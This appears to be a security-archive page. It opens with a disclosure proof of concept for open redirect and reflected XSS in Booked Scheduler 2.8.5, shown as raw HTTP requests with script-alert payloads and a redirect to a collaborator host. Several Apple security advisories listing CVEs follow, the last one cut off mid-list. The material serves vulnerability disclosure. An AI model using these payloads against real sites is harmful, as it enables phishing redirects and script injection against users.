Booked Scheduler version 2.8.5 suffers from cross site scripting and open redirection vulnerabilities.

    # Exploit Title: Open Redirect / Reflected XSS - booked-schedulerv2.8.5# Date: 10/2024# Exploit Author: Andrey Stoykov# Version: 2.8.5# Tested on: Ubuntu 22.04# Blog:https://msecureltd.blogspot.com/2024/10/friday-fun-pentest-series-13-reflected.htmlhttps://msecureltd.blogspot.com/2024/10/friday-fun-pentest-series-12-open.htmlOpen Redirect:Steps to Reproduce:1. Login and intercept HTTP request with a proxy such as Burpsuite or ZAP2. In the "resume" parameter add the redirect URL e.g. Burp Collab3. Forward the requestindex.php// HTTP POST login requestPOST /Bookedbo8effotfu/Web/index.php HTTP/1.1Host: localhostCookie: PHPSESSID=7c0a0ee0b401863e1a30acbebf301916; language=en_gb;fus_session=a15fcb9ef40abd1dece4c7fc35c2b58c; fus_visited=yesUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0)Gecko/20100101 Firefox/132.0[...]email=admin&password=password&captcha=&login=submit&resume=https://urp4vilyopoly8dhq6xa2z8v0m6du3is.oastify.com&language=en_gbg// HTTP responseHTTP/1.1 302 FoundDate: Sat, 12 Oct 2024 12:09:33 GMTServer: ApacheExpires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidatePragma: no-cacheLocation: https://urp4vilyopoly8dhq6xa2z8v0m6du3is.oastify.comContent-Length: 0Connection: closeContent-Type: text/html; charset=UTF-8Reflected XSS:reservation.php// HTTP GET requestGET/Bookedbo8effotfu/Web/reservation.php?rid="><script>alert(document.domain)</script>HTTP/1.1Host: localhostCookie: PHPSESSID=7c0a0ee0b401863e1a30acbebf301916; language=en_gb;new_version=v%3D2.8.5%2Cfs%3D1728734988;fus_session=a15fcb9ef40abd1dece4c7fc35c2b58c; fus_visited=yesUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0)Gecko/20100101 Firefox/132.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-GB,en;q=0.5Accept-Encoding: gzip, deflate, brDnt: 1Sec-Gpc: 1Upgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: same-originSec-Fetch-User: ?1Priority: u=0, iTe: trailersConnection: keep-alive// HTTP responseHTTP/1.1 200 OKDate: Sat, 12 Oct 2024 12:23:55 GMTServer: ApacheExpires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidatePragma: no-cacheConnection: closeContent-Type: text/html; charset=UTF-8Content-Length: 14003<h5><ahref="//localhost/Bookedbo8effotfu/Web/reservation.php?rid="><script>alert(document.domain)</script>">Returnto the last page that you were on</a></h5></div>schedule.php// HTTP GET requestGET/Bookedldk0euwfjx/Web/schedule.php?dr="><script>alert(document.domain)</script>HTTP/1.1Host: localhostCookie: PHPSESSID=c7aa15661bb6b0b72ab88132664b75c9; language=en_gb;resource_filter1=%7B%22ScheduleId%22%3A%221%22%2C%22ResourceIds%22%3A%5B%5D%2C%22ResourceTypeId%22%3Anull%2C%22MinCapacity%22%3Anull%2C%22ResourceAttributes%22%3A%5B%5D%2C%22ResourceTypeAttributes%22%3A%5B%5D%7D;schedule_calendar_toggle=falseUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0)Gecko/20100101 Firefox/132.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-GB,en;q=0.5Accept-Encoding: gzip, deflate, brUpgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: noneSec-Fetch-User: ?1Priority: u=0, iTe: trailersConnection: keep-alive// HTTP responseHTTP/1.1 200 OKDate: Sat, 19 Oct 2024 09:12:33 GMTServer: ApacheExpires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidatePragma: no-cacheConnection: closeContent-Type: text/html; charset=UTF-8Content-Length: 7853<h5><ahref="//localhost/Bookedldk0euwfjx/Web/schedule.php?dr="><script>alert(document.domain)</script>">Returnto the last page that you were on

Booked Scheduler 2.8.5 Cross Site Scripting / Open Redirection

Apple Security Advisory 10-28-2024-8 - visionOS 2.1 addresses information leakage, out of bounds read, and use-after-free vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

APPLE-SA-10-28-2024-8 visionOS 2.1

visionOS 2.1 addresses the following issues.  
Information about the security content is also available at  
https://support.apple.com/121566.

Apple maintains a Security Releases page at  
https://support.apple.com/100100 which lists recent  
software updates with security advisories.

App Support  
Available for: Apple Vision Pro  
Impact: A malicious app may be able to run arbitrary shortcuts without  
user consent  
Description: A path handling issue was addressed with improved logic.  
CVE-2024-44255: an anonymous researcher

CoreMedia Playback  
Available for: Apple Vision Pro  
Impact: A malicious app may be able to access private information  
Description: This issue was addressed with improved handling of  
symlinks.  
CVE-2024-44273: pattern-f (@pattern_F_), Hikerell of Loadshine Lab

CoreText  
Available for: Apple Vision Pro  
Impact: Processing a maliciously crafted font may result in the  
disclosure of process memory  
Description: The issue was addressed with improved checks.  
CVE-2024-44240: Hossein Lotfi (@hosselot) of Trend Micro Zero Day  
Initiative  
CVE-2024-44302: Hossein Lotfi (@hosselot) of Trend Micro Zero Day  
Initiative

Foundation  
Available for: Apple Vision Pro  
Impact: Parsing a file may lead to disclosure of user information  
Description: An out-of-bounds read was addressed with improved input  
validation.  
CVE-2024-44282: Hossein Lotfi (@hosselot) of Trend Micro Zero Day  
Initiative

ImageIO  
Available for: Apple Vision Pro  
Impact: Processing an image may result in disclosure of process memory  
Description: This issue was addressed with improved checks.  
CVE-2024-44215: Junsung Lee working with Trend Micro Zero Day Initiative

ImageIO  
Available for: Apple Vision Pro  
Impact: Processing a maliciously crafted message may lead to a denial-  
of-service  
Description: The issue was addressed with improved bounds checks.  
CVE-2024-44297: Jex Amro

IOSurface  
Available for: Apple Vision Pro  
Impact: An app may be able to cause unexpected system termination or  
corrupt kernel memory  
Description: A use-after-free issue was addressed with improved memory  
management.  
CVE-2024-44285: an anonymous researcher

Kernel  
Available for: Apple Vision Pro  
Impact: An app may be able to leak sensitive kernel state  
Description: An information disclosure issue was addressed with improved  
private data redaction for log entries.  
CVE-2024-44239: Mateusz Krzywicki (@krzywix)

Lock Screen  
Available for: Apple Vision Pro  
Impact: A user may be able to view sensitive user information  
Description: This issue was addressed with improved redaction of  
sensitive information.  
CVE-2024-44262: Justin Saboo

Managed Configuration  
Available for: Apple Vision Pro  
Impact: Restoring a maliciously crafted backup file may lead to  
modification of protected system files  
Description: This issue was addressed with improved handling of  
symlinks.  
CVE-2024-44258: Hichem Maloufi, Christian Mina, Ismail Amzdak

MobileBackup  
Available for: Apple Vision Pro  
Impact: Restoring a maliciously crafted backup file may lead to  
modification of protected system files  
Description: A logic issue was addressed with improved file handling.  
CVE-2024-44252: Nimrat Khalsa, Davis Dai, James Gill  
(@jjtech@infosec.exchange)

Pro Res  
Available for: Apple Vision Pro  
Impact: An app may be able to cause unexpected system termination or  
corrupt kernel memory  
Description: The issue was addressed with improved memory handling.  
CVE-2024-44277: an anonymous researcher and Yinyi Wu(@_3ndy1) from Dawn  
Security Lab of JD.com, Inc.

Safari Downloads  
Available for: Apple Vision Pro  
Impact: An attacker may be able to misuse a trust relationship to  
download malicious content  
Description: This issue was addressed through improved state management.  
CVE-2024-44259: Narendra Bhati, Manager of Cyber Security at Suma Soft  
Pvt. Ltd, Pune (India)

Safari Private Browsing  
Available for: Apple Vision Pro  
Impact: Private browsing may leak some browsing history  
Description: An information leakage was addressed with additional  
validation.  
CVE-2024-44229: Lucas Di Tomase

Shortcuts  
Available for: Apple Vision Pro  
Impact: A malicious app may use shortcuts to access restricted files  
Description: A logic issue was addressed with improved checks.  
CVE-2024-44269: an anonymous researcher

Siri  
Available for: Apple Vision Pro  
Impact: An app may be able to access sensitive user data  
Description: This issue was addressed with improved redaction of  
sensitive information.  
CVE-2024-44194: Rodolphe Brunetti (@eisw0lf)

Siri  
Available for: Apple Vision Pro  
Impact: A sandboxed app may be able to access sensitive user data in  
system logs  
Description: An information disclosure issue was addressed with improved  
private data redaction for log entries.  
CVE-2024-44278: Kirin (@Pwnrin)

WebKit  
Available for: Apple Vision Pro  
Impact: Processing maliciously crafted web content may lead to an  
unexpected process crash  
Description: A memory corruption issue was addressed with improved input  
validation.  
WebKit Bugzilla: 279780  
CVE-2024-44244: an anonymous researcher, Q1IQ (@q1iqF) and P1umer  
(@p1umer)

WebKit  
Available for: Apple Vision Pro  
Impact: Processing maliciously crafted web content may prevent Content  
Security Policy from being enforced  
Description: The issue was addressed with improved checks.  
WebKit Bugzilla: 278765  
CVE-2024-44296: Narendra Bhati, Manager of Cyber Security at Suma Soft  
Pvt. Ltd, Pune (India)

Additional recognition

Calendar  
We would like to acknowledge  K宝(@Pwnrin) for their assistance.

ImageIO  
We would like to acknowledge Amir Bazine and Karsten König of  
CrowdStrike Counter Adversary Operations, an anonymous researcher for  
their assistance.

Messages  
We would like to acknowledge Collin Potter, an anonymous researcher for  
their assistance.

NetworkExtension  
We would like to acknowledge Patrick Wardle of DoubleYou & the  
Objective-See Foundation for their assistance.

Photos  
We would like to acknowledge James Robertson for their assistance.

Safari Private Browsing  
We would like to acknowledge an anonymous researcher, r00tdaddy for  
their assistance.

Safari Tabs  
We would like to acknowledge Jaydev Ahire for their assistance.

Security  
We would like to acknowledge Bing Shi, Wenchao Li and Xiaolong Bai of  
Alibaba Group for their assistance.

Instructions on how to update visionOS are available at  
https://support.apple.com/118481. To check the software version  
on your Apple Vision Pro, open the Settings app and choose General >  
About.

All information is also posted on the Apple Security Releases  
web site: https://support.apple.com/100100.

This message is signed with Apple's Product Security PGP key,  
and details are available at:  
https://www.apple.com/support/security/pgp/

-----BEGIN PGP SIGNATURE-----

iQIzBAEBCAAdFiEEsz9altA7uTI+rE/qX+5d1TXaIvoFAmcgAfIACgkQX+5d1TXa  
IvpPzw/+OkUnfZKbUwCJy+p9jbg/ZO5i/RRbW4Tk3E6kDx0idc+p/MLRP+Guy3n+  
hJOBSf0cEcebnpu8HYJx4FnkTef0SYWfE2qhEES2Rs8kro5lA+Rr/o3yJjhE9tUN  
rWr3ZqGptThOsFiC7AxIieBlNGJAXI8J7PdtcIuN1anzF/decUf6mf9xO90nk1JH  
Feof4/Mxcks5tq6s2GGJu8jilt+Lm8rjXnrrix9Dw+fUTuz1+1Zd/hxX7M7YhCzb  
VdtLWXGHsmLNc+uxhb0krnI37x8lbfz8WrOYBaSTz3WjBvMhC9HEmFdyT9nl++nm  
HjzI5WE66YyOFufA+XwFpbroPGrSNM4k/ievpTX/39XzCLxVd1ocVHkKi8HZ2F13  
wB/7DKVj+inrXD/dVEHyW7e6dYiXrbgDOAfrkRgqv+aFYm/seuFIYxtHV8VdOrx8  
6gl27L2q4bMPIBicT6YGquyrog5qKfkD+VoiM2QPKaTt7MX70eJD7mywoFbD2cSk  
McS3pu+SPRhD0bpYx9Uy93w6w8AnBI0EtUUshF/+A7Z0bY4oAZKKsTeviqI1yYpw  
YHNSW7AO/Su/Y3mbJge4jENKjiUa8pk9am19Ks8JvMiHZhuGl1KG6GcK2pkLTZd1  
Lub2pxLg5uDPF1OkAG8IbVEi2OIXJZ8wSwphcmaKeQbcfGaVwCE=  
=l6xz  
-----END PGP SIGNATURE-----

Apple Security Advisory 10-28-2024-8

Apple Security Advisory 10-28-2024-7 - tvOS 18.1 addresses information leakage, out of bounds read, and use-after-free vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

APPLE-SA-10-28-2024-7 tvOS 18.1

tvOS 18.1 addresses the following issues.  
Information about the security content is also available at  
https://support.apple.com/121569.

Apple maintains a Security Releases page at  
https://support.apple.com/100100 which lists recent  
software updates with security advisories.

App Support  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: A malicious app may be able to run arbitrary shortcuts without  
user consent  
Description: A path handling issue was addressed with improved logic.  
CVE-2024-44255: an anonymous researcher

CoreMedia Playback  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: A malicious app may be able to access private information  
Description: This issue was addressed with improved handling of  
symlinks.  
CVE-2024-44273: pattern-f (@pattern_F_), Hikerell of Loadshine Lab

CoreText  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: Processing a maliciously crafted font may result in the  
disclosure of process memory  
Description: The issue was addressed with improved checks.  
CVE-2024-44240: Hossein Lotfi (@hosselot) of Trend Micro Zero Day  
Initiative  
CVE-2024-44302: Hossein Lotfi (@hosselot) of Trend Micro Zero Day  
Initiative

Foundation  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: Parsing a file may lead to disclosure of user information  
Description: An out-of-bounds read was addressed with improved input  
validation.  
CVE-2024-44282: Hossein Lotfi (@hosselot) of Trend Micro Zero Day  
Initiative

ImageIO  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: Processing an image may result in disclosure of process memory  
Description: This issue was addressed with improved checks.  
CVE-2024-44215: Junsung Lee working with Trend Micro Zero Day Initiative

ImageIO  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: Processing a maliciously crafted message may lead to a denial-  
of-service  
Description: The issue was addressed with improved bounds checks.  
CVE-2024-44297: Jex Amro

IOSurface  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: An app may be able to cause unexpected system termination or  
corrupt kernel memory  
Description: A use-after-free issue was addressed with improved memory  
management.  
CVE-2024-44285: an anonymous researcher

Kernel  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: An app may be able to leak sensitive kernel state  
Description: An information disclosure issue was addressed with improved  
private data redaction for log entries.  
CVE-2024-44239: Mateusz Krzywicki (@krzywix)

Managed Configuration  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: Restoring a maliciously crafted backup file may lead to  
modification of protected system files  
Description: This issue was addressed with improved handling of  
symlinks.  
CVE-2024-44258: Hichem Maloufi, Christian Mina, Ismail Amzdak

MobileBackup  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: Restoring a maliciously crafted backup file may lead to  
modification of protected system files  
Description: A logic issue was addressed with improved file handling.  
CVE-2024-44252: Nimrat Khalsa, Davis Dai, James Gill  
(@jjtech@infosec.exchange)

Pro Res  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: An app may be able to cause unexpected system termination or  
corrupt kernel memory  
Description: The issue was addressed with improved memory handling.  
CVE-2024-44277: an anonymous researcher and Yinyi Wu(@_3ndy1) from Dawn  
Security Lab of JD.com, Inc.

WebKit  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: Processing maliciously crafted web content may prevent Content  
Security Policy from being enforced  
Description: The issue was addressed with improved checks.  
WebKit Bugzilla: 278765  
CVE-2024-44296: Narendra Bhati, Manager of Cyber Security at Suma Soft  
Pvt. Ltd, Pune (India)

WebKit  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: Processing maliciously crafted web content may lead to an  
unexpected process crash  
Description: A memory corruption issue was addressed with improved input  
validation.  
WebKit Bugzilla: 279780  
CVE-2024-44244: an anonymous researcher, Q1IQ (@q1iqF) and P1umer  
(@p1umer)

Additional recognition

ImageIO  
We would like to acknowledge Amir Bazine and Karsten König of  
CrowdStrike Counter Adversary Operations, an anonymous researcher for  
their assistance.

NetworkExtension  
We would like to acknowledge Patrick Wardle of DoubleYou & the  
Objective-See Foundation for their assistance.

Photos  
We would like to acknowledge James Robertson for their assistance.

Security  
We would like to acknowledge Bing Shi, Wenchao Li and Xiaolong Bai of  
Alibaba Group for their assistance.

Apple TV will periodically check for software updates. Alternatively,  
you may manually check for software updates by selecting  
"Settings -> System -> Software Update -> Update Software."

To check the current version of software, select  
"Settings -> General → About.“

All information is also posted on the Apple Security Releases  
web site: https://support.apple.com/100100.

This message is signed with Apple's Product Security PGP key,  
and details are available at:  
https://www.apple.com/support/security/pgp/

-----BEGIN PGP SIGNATURE-----

iQIzBAEBCAAdFiEEsz9altA7uTI+rE/qX+5d1TXaIvoFAmcgAScACgkQX+5d1TXa  
IvpzYBAAoCN0SuujtunAgU1eUmXrdnRze4Jf5Wwz23Qra51OgKehUlK2n1DuToJM  
Gs3Bw6inMGX+kizS4vhInhoJ7Z4kArROvKooV6qBtJw5lq7Imxr3E7305dWU230s  
HRjaMamEE3llDflvOo5fiKiKBYihuH+qOZ/jrdzdPSaw4zpw5gDA6za5pfAnW58U  
2tzwM0zSkAXiAIBrzYlNVcmL7EYdLgullxsSK6KI26qWRAWsN9u5PljzfCBOr1vo  
5geJY3EFSjdcrWm1s3AKYCPJQgiL3UwcGFIQqyKsrtwRaFUuM0l/nOIdvP8SW2BY  
8wC06REVN2yV29qECsBhtaqXwybBDdwZiBaJ7BaAnHTZzrd0Vc00LC2UgMhT+Qb8  
9EtcgsrImVqVKFXsdYvQlqxuWGYJRjkpMuWF2aCtqgjPvUfipzB0HDMhqgFpzeet  
EIMFYEV+IqoNYg6AfrsBA+ok4IHaVSyTWHB0k5rQM0YVaVF6MHqZYhKj/lbiHax9  
sJbEaDkiFF+xHSKc3LnoG+KTlXboHaaNDyD4/uyEsrcS1S9y4Ni+WnZi2ufluItW  
Wl7aRYr+UMR6qc7zWL2mY5cafT/hfNVu6tUbfIWyN5LE9imT27IIVZfzsQ299PCF  
Kmi61d0fwS9AuJrxic1TnMbNEGS2g0NLcmTEMeIWFatzhpurglA=  
=zC9Y  
-----END PGP SIGNATURE-----

Apple Security Advisory 10-28-2024-7

Apple Security Advisory 10-28-2024-6 - watchOS 11.1 addresses information leakage, out of bounds read, and use-after-free vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

APPLE-SA-10-28-2024-6 watchOS 11.1

watchOS 11.1 addresses the following issues.  
Information about the security content is also available at  
https://support.apple.com/121565.

Apple maintains a Security Releases page at  
https://support.apple.com/100100 which lists recent  
software updates with security advisories.

Accessibility  
Available for: Apple Watch Series 6 and later  
Impact: An attacker with physical access to a locked device may be able  
to view sensitive user information  
Description: The issue was addressed with improved authentication.  
CVE-2024-44274: Rizki Maulana (rmrizki.my.id), Matthew Butler, Jake  
Derouin

App Support  
Available for: Apple Watch Series 6 and later  
Impact: A malicious app may be able to run arbitrary shortcuts without  
user consent  
Description: A path handling issue was addressed with improved logic.  
CVE-2024-44255: an anonymous researcher

CoreMedia Playback  
Available for: Apple Watch Series 6 and later  
Impact: A malicious app may be able to access private information  
Description: This issue was addressed with improved handling of  
symlinks.  
CVE-2024-44273: pattern-f (@pattern_F_), Hikerell of Loadshine Lab

CoreText  
Available for: Apple Watch Series 6 and later  
Impact: Processing a maliciously crafted font may result in the  
disclosure of process memory  
Description: The issue was addressed with improved checks.  
CVE-2024-44240: Hossein Lotfi (@hosselot) of Trend Micro Zero Day  
Initiative  
CVE-2024-44302: Hossein Lotfi (@hosselot) of Trend Micro Zero Day  
Initiative

Foundation  
Available for: Apple Watch Series 6 and later  
Impact: Parsing a file may lead to disclosure of user information  
Description: An out-of-bounds read was addressed with improved input  
validation.  
CVE-2024-44282: Hossein Lotfi (@hosselot) of Trend Micro Zero Day  
Initiative

ImageIO  
Available for: Apple Watch Series 6 and later  
Impact: Processing an image may result in disclosure of process memory  
Description: This issue was addressed with improved checks.  
CVE-2024-44215: Junsung Lee working with Trend Micro Zero Day Initiative

ImageIO  
Available for: Apple Watch Series 6 and later  
Impact: Processing a maliciously crafted message may lead to a denial-  
of-service  
Description: The issue was addressed with improved bounds checks.  
CVE-2024-44297: Jex Amro

IOSurface  
Available for: Apple Watch Series 6 and later  
Impact: An app may be able to cause unexpected system termination or  
corrupt kernel memory  
Description: A use-after-free issue was addressed with improved memory  
management.  
CVE-2024-44285: an anonymous researcher

Kernel  
Available for: Apple Watch Series 6 and later  
Impact: An app may be able to leak sensitive kernel state  
Description: An information disclosure issue was addressed with improved  
private data redaction for log entries.  
CVE-2024-44239: Mateusz Krzywicki (@krzywix)

Shortcuts  
Available for: Apple Watch Series 6 and later  
Impact: An app may be able to access sensitive user data  
Description: This issue was addressed with improved redaction of  
sensitive information.  
CVE-2024-44254: Kirin (@Pwnrin)

Shortcuts  
Available for: Apple Watch Series 6 and later  
Impact: A malicious app may use shortcuts to access restricted files  
Description: A logic issue was addressed with improved checks.  
CVE-2024-44269: an anonymous researcher

Siri  
Available for: Apple Watch Series 6 and later  
Impact: An app may be able to access sensitive user data  
Description: This issue was addressed with improved redaction of  
sensitive information.  
CVE-2024-44194: Rodolphe Brunetti (@eisw0lf)

Siri  
Available for: Apple Watch Series 6 and later  
Impact: A sandboxed app may be able to access sensitive user data in  
system logs  
Description: An information disclosure issue was addressed with improved  
private data redaction for log entries.  
CVE-2024-44278: Kirin (@Pwnrin)

WebKit  
Available for: Apple Watch Series 6 and later  
Impact: Processing maliciously crafted web content may prevent Content  
Security Policy from being enforced  
Description: The issue was addressed with improved checks.  
WebKit Bugzilla: 278765  
CVE-2024-44296: Narendra Bhati, Manager of Cyber Security at Suma Soft  
Pvt. Ltd, Pune (India)

WebKit  
Available for: Apple Watch Series 6 and later  
Impact: Processing maliciously crafted web content may lead to an  
unexpected process crash  
Description: A memory corruption issue was addressed with improved input  
validation.  
WebKit Bugzilla: 279780  
CVE-2024-44244: an anonymous researcher, Q1IQ (@q1iqF) and P1umer  
(@p1umer)

Additional recognition

Calculator  
We would like to acknowledge Kenneth Chew for their assistance.

Calendar  
We would like to acknowledge  K宝(@Pwnrin) for their assistance.

ImageIO  
We would like to acknowledge Amir Bazine and Karsten König of  
CrowdStrike Counter Adversary Operations, an anonymous researcher for  
their assistance.

Messages  
We would like to acknowledge Collin Potter, an anonymous researcher for  
their assistance.

NetworkExtension  
We would like to acknowledge Patrick Wardle of DoubleYou & the  
Objective-See Foundation for their assistance.

Photos  
We would like to acknowledge James Robertson for their assistance.

Security  
We would like to acknowledge Bing Shi, Wenchao Li and Xiaolong Bai of  
Alibaba Group for their assistance.

Siri  
We would like to acknowledge Bistrit Dahal for their assistance.

Instructions on how to update your Apple Watch software are  
available at https://support.apple.com/108926

To check the version on your Apple Watch, open the Apple Watch app  
on your iPhone and select "My Watch > General > About".

Alternatively, on your watch, select "My Watch > General > About".

All information is also posted on the Apple Security Releases  
web site: https://support.apple.com/100100.

This message is signed with Apple's Product Security PGP key,  
and details are available at:  
https://www.apple.com/support/security/pgp/

-----BEGIN PGP SIGNATURE-----

iQIzBAEBCAAdFiEEsz9altA7uTI+rE/qX+5d1TXaIvoFAmcgAEsACgkQX+5d1TXa  
IvpYqw//e5YtWRJMacUQbK4oainyrTgy1EkXT3mV7zHSmzfMYOrhfGVd/4yKMsaa  
PSrREy9rcN/oQdLulbAhDfqzEmHSczIxWeP4J48xSR6Od/PY9KFdg4tUJ/DjWp62  
LgvsxyOY6HFt5vvzh0Cguf7xjskHgHKAgX+PbByT/RNLEOk8Q4F3acKyq1D3oGH4  
5yRBHkNyY2rpJtu/6wrxKrn5+H/OFDcO9ABp772nGm75pa1aaxuLlocVdOezZAod  
uWmApZDfLns3wh5yBBuGd9XfXMlpKE0zl1i8y6bPDqe9DBYvS8j0fnZGKNURUaBV  
yIPYJi1IH8V0jTYhnwUN0bTYE1IrEYU1sUSDEcq4vBmSxPxXZmY2sgcIjnEgJY8Q  
d0f1tzd/C0qPYAIpRIFj8bpgbN22uDEVbT58dh+idhg6c+tckQnGEmadPg9c9H/m  
/QxJcc5LdMMwOmyBTSNbwykvb6GKO5TLec1PhU/SImSXxAmtLwNWPk72tZpWEZiI  
ASKal+XcCa/SO3Fyfh+VhhbjmJIdR9wki2R+DXUcwfktOVKb4GWMDWPv6KiRL4ls  
cNudvcc409JBnIJpKAojXcmzPdqWlICbrPTHihyO9Vf7tIRcgxpBaX8YgYy+lyO4  
3kzUGycxUi4kqHao38ag7xNANdHQxO1VTamYDJLYCEXi62kuxno=  
=7KV0  
-----END PGP SIGNATURE-----

Apple Security Advisory 10-28-2024-6

Apple Security Advisory 10-28-2024-5 - macOS Ventura 13.7.1 addresses bypass, information leakage, out of bounds access, out of bounds read, and out of bounds write vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

APPLE-SA-10-28-2024-5 macOS Ventura 13.7.1

macOS Ventura 13.7.1 addresses the following issues.  
Information about the security content is also available at  
https://support.apple.com/121568.

Apple maintains a Security Releases page at  
https://support.apple.com/100100 which lists recent  
software updates with security advisories.

App Support  
Available for: macOS Ventura  
Impact: A malicious app may be able to run arbitrary shortcuts without  
user consent  
Description: A path handling issue was addressed with improved logic.  
CVE-2024-44255: an anonymous researcher

AppleMobileFileIntegrity  
Available for: macOS Ventura  
Impact: A sandboxed process may be able to circumvent sandbox  
restrictions  
Description: A logic issue was addressed with improved validation.  
CVE-2024-44270: Mickey Jin (@patch1t)

AppleMobileFileIntegrity  
Available for: macOS Ventura  
Impact: An app may be able to modify protected parts of the file system  
Description: A downgrade issue affecting Intel-based Mac computers was  
addressed with additional code-signing restrictions.  
CVE-2024-44280: Mickey Jin (@patch1t)

ARKit  
Available for: macOS Ventura  
Impact: Processing a maliciously crafted file may lead to heap  
corruption  
Description: The issue was addressed with improved checks.  
CVE-2024-44126: Holger Fuhrmannek

Assets  
Available for: macOS Ventura  
Impact: A malicious app with root privileges may be able to modify the  
contents of system files  
Description: This issue was addressed by removing the vulnerable code.  
CVE-2024-44260: Mickey Jin (@patch1t)

CoreServicesUIAgent  
Available for: macOS Ventura  
Impact: An app may be able to modify protected parts of the file system  
Description: This issue was addressed with additional entitlement  
checks.  
CVE-2024-44295: an anonymous researcher

CoreText  
Available for: macOS Ventura  
Impact: Processing a maliciously crafted font may result in the  
disclosure of process memory  
Description: The issue was addressed with improved checks.  
CVE-2024-44240: Hossein Lotfi (@hosselot) of Trend Micro Zero Day  
Initiative  
CVE-2024-44302: Hossein Lotfi (@hosselot) of Trend Micro Zero Day  
Initiative

CUPS  
Available for: macOS Ventura  
Impact: An attacker in a privileged network position may be able to leak  
sensitive user information  
Description: An issue existed in the parsing of URLs. This issue was  
addressed with improved input validation.  
CVE-2024-44213: Alexandre Bedard

DiskArbitration  
Available for: macOS Ventura  
Impact: A sandboxed app may be able to access sensitive user data  
Description: The issue was addressed with improved checks.  
CVE-2024-40855: Csaba Fitzl (@theevilbit) of Kandji

Find My  
Available for: macOS Ventura  
Impact: An app may be able to read sensitive location information  
Description: A privacy issue was addressed with improved private data  
redaction for log entries.  
CVE-2024-44289: Kirin (@Pwnrin)

Foundation  
Available for: macOS Ventura  
Impact: Parsing a file may lead to disclosure of user information  
Description: An out-of-bounds read was addressed with improved input  
validation.  
CVE-2024-44282: Hossein Lotfi (@hosselot) of Trend Micro Zero Day  
Initiative

Game Controllers  
Available for: macOS Ventura  
Impact: An attacker with physical access can input Game Controller  
events to apps running on a locked device  
Description: The issue was addressed by restricting options offered on a  
locked device.  
CVE-2024-44265: Ronny Stiftel

ImageIO  
Available for: macOS Ventura  
Impact: Processing an image may result in disclosure of process memory  
Description: This issue was addressed with improved checks.  
CVE-2024-44215: Junsung Lee working with Trend Micro Zero Day Initiative

ImageIO  
Available for: macOS Ventura  
Impact: Processing a maliciously crafted message may lead to a denial-  
of-service  
Description: The issue was addressed with improved bounds checks.  
CVE-2024-44297: Jex Amro

Installer  
Available for: macOS Ventura  
Impact: An app may be able to access user-sensitive data  
Description: An access issue was addressed with additional sandbox  
restrictions.  
CVE-2024-44216: Zhongquan Li (@Guluisacat)

Installer  
Available for: macOS Ventura  
Impact: A malicious application may be able to modify protected parts of  
the file system  
Description: The issue was addressed with improved checks.  
CVE-2024-44287: Mickey Jin (@patch1t)

IOGPUFamily  
Available for: macOS Ventura  
Impact: A malicious app may be able to cause a denial-of-service  
Description: The issue was addressed with improved memory handling.  
CVE-2024-44197: Wang Yu of Cyberserval

Kernel  
Available for: macOS Ventura  
Impact: An app may be able to leak sensitive kernel state  
Description: An information disclosure issue was addressed with improved  
private data redaction for log entries.  
CVE-2024-44239: Mateusz Krzywicki (@krzywix)

LaunchServices  
Available for: macOS Ventura  
Impact: An application may be able to break out of its sandbox  
Description: A logic issue was addressed with improved checks.  
CVE-2024-44122: an anonymous researcher

Maps  
Available for: macOS Ventura  
Impact: An app may be able to read sensitive location information  
Description: This issue was addressed with improved redaction of  
sensitive information.  
CVE-2024-44222: Kirin (@Pwnrin)

Messages  
Available for: macOS Ventura  
Impact: An app may be able to break out of its sandbox  
Description: The issue was addressed with improved input sanitization.  
CVE-2024-44256: Mickey Jin (@patch1t)

PackageKit  
Available for: macOS Ventura  
Impact: An app may be able to bypass Privacy preferences  
Description: A path deletion vulnerability was addressed by preventing  
vulnerable code from running with privileges.  
CVE-2024-44156: Arsenii Kostromin (0x3c3e)  
CVE-2024-44159: Mickey Jin (@patch1t)

PackageKit  
Available for: macOS Ventura  
Impact: An app may be able to modify protected parts of the file system  
Description: A permissions issue was addressed with additional  
restrictions.  
CVE-2024-44196: Csaba Fitzl (@theevilbit) of Kandji

PackageKit  
Available for: macOS Ventura  
Impact: An app may be able to modify protected parts of the file system  
Description: The issue was addressed with improved checks.  
CVE-2024-44253: Mickey Jin (@patch1t), Csaba Fitzl (@theevilbit) of  
Kandji

PackageKit  
Available for: macOS Ventura  
Impact: A malicious application may be able to modify protected parts of  
the file system  
Description: The issue was addressed with improved checks.  
CVE-2024-44247: Un3xploitable of CW Research Inc  
CVE-2024-44267: Bohdan Stasiuk (@Bohdan_Stasiuk), Un3xploitable of CW  
Research Inc, Pedro Tôrres (@t0rr3sp3dr0)  
CVE-2024-44301: Bohdan Stasiuk (@Bohdan_Stasiuk), Un3xploitable of CW  
Research Inc, Pedro Tôrres (@t0rr3sp3dr0)  
